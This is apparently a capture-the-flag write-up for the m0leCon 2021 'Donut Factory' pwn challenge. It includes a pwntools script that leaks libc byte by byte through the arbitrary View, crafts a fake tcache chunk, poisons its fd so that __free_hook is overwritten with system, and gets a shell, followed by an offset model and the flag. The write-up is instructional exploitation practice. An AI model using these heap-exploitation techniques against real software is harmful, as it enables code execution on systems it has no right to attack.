Tags: craft heap fake_chunk
Rating:
[Link to original writeup](https://wrecktheline.com/writeups/m0lecon-2021/#donut_writeup)
# Donut Factory (15 solves, 263 points)
by FeDEX
```
Come visit our factory to create your custom donuts!
nc challs.m0lecon.it 1743
Author: Alberto247
```
This challenge provided 2 files: the `donut` binary and `libc-2.31.so`.
A simple menu-based challenge with the options to:
- Create donut
- Delete donut
- View donut
- Buy Donut
- Leave
Quickly reversing the program, we find that the `Delete` and `View` functionalities take an unsanitized address as input, allowing us to perform those actions on arbitrary addresses.
The Delete method takes an address as input and frees it.
The View method takes an address as input and prints a donut chosen by the first byte at that address.
Following this, I generated every donut, saved the hash of each one in a table, and then used View to leak the libc pointer from a freed heap chunk one byte at a time (the index of the matching hash is the byte value).
```python
from pwn import *
import hashlib

# MD5 of each rendered donut, indexed by the byte value that produces it
hashes = ["244b8911aae2f329311f6d6511bb3c3c","9e12b4534de7339be7c1c550e42193f4","3517d5c190d9891461f855833686ce02","31f807fd73e342128428d0446620c3cb","e4140bf37897507a4baf6b5a679d9919","70dadc8a305d5594fe42a71785d5a97b","6c1f3bfceb82675c409eb3a9a173592f","27f3bee48c0f41f8fb494fcc8048e919","550fee47562795ebda1ea957e02bda0f","c7b22166c88a40eccfcf8732499e40d1","79a490bd8bc95a9e447f1af1f272f59a","0e793dd64dfb6eeaed878d9dcfa021e3","535e39e5e031961bacd91a1a3e7aaf38","74aecbca921511a0fef7b9db6767795d","df77b317a2ffd306893ca4395cfa2811","0f3c26437382ce2d5cbc253ecf912966","157461a3d1de9805c73b53c36c9d1925","a4bf483f8b958d05d78beadc80ea95a3","c1e90ac302441cdcef82528d318d298a","c59a0fdbec6e95ce8543fe2c0588b199","878f4d8961abb07585eec52242ac5054","1c3c336e76c9f6f4204239d7d68fc0c7","92b72832a439731509cb2b19c5063526","362ca530322fa159c7597a533372b3bc","8507b0c24546f5fc10ebecd26ab718b6","491a700da38fb98b6183e6c18d3296be","6b07a7b8416c7275c973158ddaa7357d","a14b87d441f3a7e52a647328d3a503d2","0a3910b8ac25ae8bbb6a03346b64f04c","9bf2dc4b520f698f5df821b6bdda0832","c36d65dc3f8cbdc199fcdbc78a6adff3","1dfafd64239861ec8976219bb0589351","756c4c95eef6cf127ca47d9c582ffee0","13e206ff982d36e82117d80b7a485aa9","2266c15194b98c647e243461abe42fe3","6ded8fdc2381cce1592f8d09a4a95c3d","b5487c60d1224434444bfd9236c709c7","e1ffb5c58845ffc368069f2a5b217bb5","b1875b40d0a3f4306f3f35203d4f6e47","f76a9c9f0d7acd77ceae43edc5162a5c","91717e87f382ec3643028b82da8c60c0","2fae081d73db99dc269da9bf1d9ecf01","4195d602e0c4b7c9940aaf9f72d3a73a","3b66601aee65402d5034a3b853e59aae","617196e86d4bcf9d7764f30f24734978","781609ffbae6bd53efba2f8bef9bf354","018e0f642cbd14fab3583b11d3503366","d06ad4593071eab0c7a64ffc62b74d61","8566c56cb71bbb4501b6d0f7c33ffcc7","336d9786cde6ea8995193084a1d9535f","2296a95a8d5ed3d6a4a2a5d44b9d8752","a5d41c4efc1668ccd6f13489ee0b6962","db8129e49e38831e955b51722a82e5e9","4dae69a5b462ac042c25bd36d6834c10","ab8ea2d6ab74277e057096ad221e1b1b","7a1b732c62c27e44d58aa5c8b94a89b8","e7776912cf2d73fe9c0ed71bace54
68b","a08ba9655620bb8507da6439d64c8d43","a66e9a7140d86c5fb8ae912f432e298d","ee4e519a9c42a244621b16a02840d56f","9dd6f10f3ad48d0de2668e7b59818b7e","26a7195cff38401ec3a72b090bf50eaf","02fbe940ff64454bfd82de8a9b3626b9","61a65086a1da0342805f60b43ff0e03d","3f048d2ee699756f90530154808594ea","c3ad0b1059c7a0ed1254113b724591ad","522a994709b8fca96e5e981cabb655e5","aacd10c132ad192cfb94d3469dc35f24","f0d250a6a25cf33edbb19cc252899a19","408140dd3008b8da4b8378939a309f4a","0bc5c8454d5b3a1054df5d9c1ff38dc0","c91203b96d22b5cb3bdd3b27f0a1f111","e9e6233859c6f5b62532eb760e978178","0d82f46293df813946c1fd6bf159206c","ac448688a38d6f614366bb39cef03eef","93dc00ec08dfb66919f25671523fe612","47f21e690538237b94eeac2ca98ee0b7","088b6256948a64e0f1643be6b072b159","ea01cec409b620a60319291540f614d7","6d25b193f750efba5cd08b2769c0e3a7","4f6b299178369d1ee12b92d9e828bacf","61345b477c5597926af5e6bf36ce0e0a","52aef517cfc57a654ed230ca4c1362d7","c8c204a854409da700158526cae62435","e1cdd4d5caf77c6f3fec87214f5bb9dc","145c3c25998a15749519818bb89c135f","438b5dd73f94a5c5d0d0362ad4a66e6c","46f3a1705af1ebf4d9859b188684fd8a","0475d66adb47f2d47d76c3332b10b7c9","7cfcd6c4d5ad54026e9f537d38b9f59e","039b2e616cc311f44aadfa0c87160883","7cdef375044f36af43db571769536bdf","b1e1b4eead9587bbdff13bf15d197533","7bfb237b4b335c973f3bf7a6dd1cbd32","20dce478a13cec86b93d91a279053fba","33dd8cc72e018ff1c072aa44094b24ca","5ec3331b69725074c0c0774d64275e1f","e6e1729ff202433d82a9a79db3dfbac3","fb75b8d513aeba8a8f77d68f22f99815","b72b90a296d09822fda435208351d399","0186368abd0b3cd1971eb92b22dfa891","240d0624a58b37c76c1c30142ae20c20","1b6986d19e2920b8969eda71c0f06f23","6335c0e4d544e951618e0a2391615620","d882120924e914555016ee516ef8b1f6","5dd36739c264232ce517ef30c69e4020","d44d13f74c644c393daddc806b8effb6","0b347e6704a266e42c74463932e6887c","beec5ab4565cbe1f913a0653234bf996","6f4a0772195bcee71e6554e5e6d06178","256761ab9ec28964531955bad1689db0","8aa2a07a1b6b26dc492110b225e74fa0","cdfc4702005dd5ee08b8fba5400efef2","171582347945021b955f3d9f4bbc3d19",
"287ec05f16189f349e71e8f5739ff576","cab56c9f5311d74d1716958867abea24","8da48008d6411218ea86ed8d4b2ed3b6","08748849f4347c106f18af768eda9004","d329133ebcfedcc025fde1bf438e3d9f","61c5dd9b0ef3e9193a0b76d0605d8325","ca1bd76a428edc0571f6d4d025c0e5f1","e67f49d0be0c1ca3d15b75ad59dc5286","fba5d4915b188ca14ac29ec613899cdb","a299f56e65ddbadddda8b42d2b2358de","dc295a6371c3612cef283a27e116791d","d2d94c386c355e79016d0c34f7964048","eb6a00da275608fcc6e494bf14ed9a42","8003b4a3745233792a8a64f888b05281","1772180f1b6921354b1dfa2a9287260c","88473fd94b8e70ad46024b443e87e2fe","1b943cbe2b15cfe4fd866cd012912bd0","87e828501e6b82215d52da376fd9eb07","c44673531799a2de7b0344db39c4f1ae","feb0de99e0148fb89301457d8d6183dd","c3ae1a82c5fffb46653ade9aef3374cd","332370cce096416a199132f81c552604","d15a6f84d8176e910e145e9c94888dce","8e7178b0f0bbb42ccdcccfaddff5905e","d6e3c4db0a910736229919317e460925","9bdeea65860ab7ff1b7dba1b93446ccc","d1c82eff6118130af4adfb52963c5d1b","11d2601eab00b6462a39c43012846ab2","f177cef6b70774d36191cc2da5f48a76","3c439c9fd851c489d7e1527ede816560","de7d6a7ecd141bc6cba721b237d5fea4","90294a9ce3e7b02fbe2997e8ea378dff","d72e0b774f76bd6a3ddb823968d217c8","3d5ae0ef52e6f12e2378e83dd45c5b8f","9d72ce79bbaf8aef05d0350203b8da06","81be16218ee6c266773294a0d02d294e","addb2903ff8275d2bcd46ff8308b8e6b","645dbaeaa7dc933079a296bb8f66e083","f374e5a0b750056d00b89bb164970801","de10e4eb59b089d87598ce38f3c2fc9e","9d1bc9288c95a4ea889f437e61e79a15","543fc78ee3d8759c6eec584b7266faca","364d6362838a2b0de8e6482b2be88cc5","7d035f1bbc2f87fc1ccb9166d34f9a24","52eaa4aaed9202a8d4eeced5892af249","523d690bdf5e456e87f8c5a02c6ef0ce","8950b6981b82d6dda8aeb8d58adc9ada","0c5b179b055218ca10675b595b8d25aa","59c8e341cd9f3ebbd53182796506b442","fb04215e976e21486539fca63a559b64","a81861b0313a41d3084fd59da58b6ddf","2578adf8096e9054d7b248b8a8f361cf","33bd9ed361d6132fa027a613d8520bfc","c50bfa8726fd0c941fa49b5c99d2ea0d","154ca97762c31f6dce7aab2fd2dd4464","1c9a10afedd053493cd769d6d285506e","a3c47ecf4e1641a8db7bccb8e94e59c1","0129
385b79426e13e24b750fb251b914","7e2daf44701c1356daf09c3fda75043b","e5846a457cc491683b53104df2021bf5","f8df3f2920d49cb3b86c3cb5cca04712","8f6362a7798ac335e5a725093abd06cc","e20d227b4ce6fcc76b8f0c76f6684bea","d7e3a97da001f59263643eb17d017cc8","be8a8dd440b697fac03061912c4021a8","22b001b903ba17c611ba4ed52477ca6b","db89bfdce129d88cf9e0cb7d9fc5c46f","e7769723f8fdbe76e2e1c48d7cddec5e","da3cf19ff1f5ca7fca088ab389b5cff0","0c2887a59682f19aab3012494db3484c","4edd35d8cde21b9695617b1f94076139","af55970f88c5e52a422aeb4b848a7087","77fa572655440cd82db5d42f9e30ca05","6e7a56bf66a07ac42b9a70df1cdac57b","c8652795213654feef519aedafab549c","0269d4b55b3ca1e8db252acf43db1b25","c8da711c93da6f0bd012a46e02c8a391","e00133726009504cbdb9d1697aaad05a","beebc3290e9050f4c8b405a673bb62d6","a1371bbc45894596125c34d9c8515036","ffc2fd64411bd8dc04496505e626bb29","4fe7b41fe37089cf722145b3ab53fd72","042b93b8286f628b5e8083765c4d4a1f","aa775b01118dd41e733ba2d3f3c4bd30","c3e5d248b0ac1c4f5063c4addfe56be9","ee7048a5e23dadd613a556da013dc9f9","88a8935ed4c82c20b1a0e6a02b94c432","7b24d486674fae9f9d182c134a61c4c0","a6af33e066c780b6710518306e2a8ddd","a00b87e316e14a41c8d7988b332ff954","904319188297d0dfed6533c65a4f20bc","44546db5a37f8666a5f5655965dc158a","afe67c388dd12a4943474784be62bf80","e71b8c06fef88758efbfaf0542c18f32","af35dc9ba30af53ab082be2cd763eb2f","87a6a01ec8948d48e7413e6c815e979e","49b44342c19f4d8c5ac214b82ca18d01","d8d8aea73fa72f2c98e7b3b0b5889b6b","4a442985c50d13c3b233b75c93de4595","8a51916019777fb7008318bb0221c6c8","8e53f8838d46fe4aa7e2a89a52f662db","85bb6f314c12f7d74bd62e03215b9153","f276a64fb37fc07c3eed642888332ccd","3d2619f673af2595277601d548059664","2cdfffa1cce47a0f1c103d98010775c3","15acbc1221bf58d5ad7571a8eb35d773","8a1392816509e0ebc42e5bd50792b6a8","73213ef32093bdd8867cbbf3ff4b5c43","24427f6f2e5e3aea08df2d5d04eb31e3","38a2dee8cae9d297855196b48521a774","e322e8836d30fcede0bc4599460570a0","f14b95c1bdd3cdb1f16cd4b03cae42c6","4e74b4d448035455b6da485e99b47a8b","5a889cd08e4bc55319a65aa9a7a75508","c4670d041
7bca5fed0568452d4475f2d","99be610f21f7b712164c24d8732abd76","83376b59ba424dd3fb0456801961e107","668c1d8e62bc292ce1ef5b709ea8994f","ea6c08b34f228e10ad5157cd5b550fbe","73a6b98c64c9547fe077ba4d011dbccc","7a50f50ac2b1343aa74b2fcf26fb7a4b","e81b1e29982f3f8dab744b9de6ed3f07","75835b858eac15248772f39fc53eb34d","250bdeb6439df36461c0dd11629735f9","ef88c3e74d9b0e6b8ae895e16a15ba98","fbf35ddef33e6c567b81c6a77023e8d3","537ea975260d29ad418ef4184878d83d","60fe12c00a765af59fba90a2325dd694","aa9126aaa343a4703dd40521f2a4f919","56cb90f8d1c1cf2185c458b3915eaf77","6a9681d9d671b9e8e2b9279db93b9cc0","1826d982863eb441f0f944fff375d459","8d3c19a937665f89faf84f4d5dca8fc5","df95a4ad9a93d9fcb3c8cde5c21919b9","f8172e59c358e958e80ae6cdfaf98cd0","d1ddbe82b534adc606f2c7880bca473a","c6315d205043074b6e24c99678bb8606","db27f5b7975fc23bfb84c769d7da12f5","1ae3ecadf02d6c1ba26b15f92bad611d","8d887a9262277858be3c2cee9f7fc1df","48270138b22931afc183a62e1d77061f","a348d1e3cb8fc29f45650d8e6727d5b5"]
def leak_byte(ptr):
    # View renders the donut selected by the byte at ptr; identify it by hash
    p.sendlineafter('factory\n', 'v')
    p.sendlineafter('!', hex(ptr))
    donut = p.recvuntil('We')
    final_donut = donut.split(b'\x1B')[-1]   # last ANSI escape sequence holds the drawing
    to_hash = final_donut[:-2] + b"Do"
    hashed = hashlib.md5(to_hash).hexdigest()
    return hashes.index(hashed)              # position in the table == byte value

def leakqword(ptr):
    value = ''
    for i in range(8):
        tmp = leak_byte(ptr + i)
        value += chr(tmp)
    return value
```
Once I had the heap leak (the program gives the chunk address) and the libc leak, I was ready to craft a fake chunk inside a big chunk, free it, corrupt its `fd` pointer, and then obtain a chunk over `free_hook`.
After that, freeing a chunk containing `"/bin/sh"` triggered a shell.
Exploit:
```python
# Assumed but not shown in the writeup: p is the pwntools connection and
# create()/destroy() wrap the menu's Create/Delete options; create() returns the
# new chunk's address as a hex string, destroy() frees the given address.
# p = remote('challs.m0lecon.it', 1743)

if __name__ == "__main__":
    ################################## EXPLOIT
    xx = create(1, 0x30, '/bin/sh\x00\x0a')   # chunk used to trigger the shell
    d1 = create(1, 0x800, 'A'*10 + '\x0a')    # used to leak heap and libc
    heap_base = int(d1, 16) - 0x16c0
    print 'HEAP >>', hex(heap_base)
    d2 = create(1, 20, 'A'*10 + '\x0a')       # avoid consolidation with top
    print 'DESTROYING >>', d1
    destroy(int(d1, 16))                      # big chunk goes to the unsorted bin, fd/bk point into libc
    leak = leakqword(int(d1, 16))             # leaking libc byte by byte
    leak = hex(u64(leak))
    libc_base = int(leak, 16) - 0x1ebbe0
    print 'LIBC >>', hex(libc_base)
    d1 = create(1, 0x800, 'A'*10 + '\x0a')    # remove big chunk from unsorted bin
    craftx = create(1, 0x68-2, 'ffff\n')      # tmp chunk (0x70 size class)
    craft1 = create(1, 0x200-2, '\x00'*7 + p64(0)*2 + p64(0x70) + '\n')  # chunk holding a fake 0x70 header at +0x10
    print 'CRAFT >>', craft1
    destroy(int(craftx, 16))                  # free tmp chunk into tcache[0x70]
    destroy(int(craft1, 16) + 0x20)           # free fake chunk (its user pointer is at +0x20) into tcache[0x70]
    destroy(int(craft1, 16))                  # free big chunk
    craft = create(1, 0x200-2, 'X'*7 + p64(0)*2 + p64(0x70) + p64(int(libc_base)+0x1eeb28-8)*3 + '\n')  # reallocate big chunk and corrupt fake chunk's fd
    create(1, 0x68-2, 'Y'*0x18 + '\n')        # first 0x70 allocation returns the fake chunk
    create(1, 0x68-2, 'Z'*7 + p64(int(libc_base)+0x0000000000055410) + '\n')  # second returns free_hook-8: overwrite free_hook with system
    destroy(int(xx, 16) + 1)                  # free("/bin/sh") now calls system("/bin/sh")
    p.interactive()
```
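To see why the offsets in the payloads above line up, here is an added Python 3 model (not from the original writeup) that reads the crafted buffers the way malloc reads a chunk header. It assumes the layout implied by the `destroy(xx+1)` call, namely that create() stores the donut type in byte 0 and the user data from offset 1, and reuses the libc-2.31 offsets from the exploit.

```python
import struct

# libc-2.31 offsets taken from the exploit above
FREE_HOOK = 0x1eeb28
SYSTEM = 0x55410

def p64(v):
    return struct.pack('<Q', v)

def u64(b):
    return struct.unpack('<Q', b)[0]

def donut_payload(data):
    # Assumed model of what create() leaves in memory: byte 0 is the donut
    # type, user bytes follow from offset 1 (the 7-byte pad realigns to 8).
    return b'\x01' + data

def chunk_view(mem, base, user_ptr):
    """Read mem (bytes stored at address base) as malloc reads the chunk whose
    user pointer is user_ptr: the 16-byte header sits just below the pointer."""
    off = user_ptr - base - 0x10
    mem = mem.ljust(off + 24, b'\x00')          # fields never written read as 0
    size_field = u64(mem[off + 8:off + 16])
    return {
        'prev_size': u64(mem[off:off + 8]),
        'size': size_field & ~0x7,               # tcache bins on this alone
        'prev_inuse': bool(size_field & 1),
        'fd': u64(mem[off + 16:off + 24]),       # tcache 'next' once freed
    }

def model(craft1, libc_base):
    # 1. first create(1, 0x200-2, ...): plants a 0x70 header at craft1+0x10,
    #    so destroy(craft1+0x20) frees a chunk that lands in tcache[0x70]
    plant = donut_payload(b'\x00' * 7 + p64(0) * 2 + p64(0x70))
    fake = chunk_view(plant, craft1, craft1 + 0x20)
    # 2. re-allocation payload: same header, but the fd at offset 0x20 now
    #    points 8 bytes below __free_hook
    target = libc_base + FREE_HOOK - 8
    corrupt = donut_payload(b'X' * 7 + p64(0) * 2 + p64(0x70) + p64(target) * 3)
    poisoned = chunk_view(corrupt, craft1, craft1 + 0x20)
    # 3. the second 0x70 allocation is served from `target`; its payload puts
    #    p64(system) at offset 8, which is exactly __free_hook
    final = donut_payload(b'Z' * 7 + p64(libc_base + SYSTEM))
    return {'fake': fake, 'poisoned': poisoned,
            'hook_write_addr': target + 8,
            'hook_write_value': u64(final[8:16])}
```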
- flag: `ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}`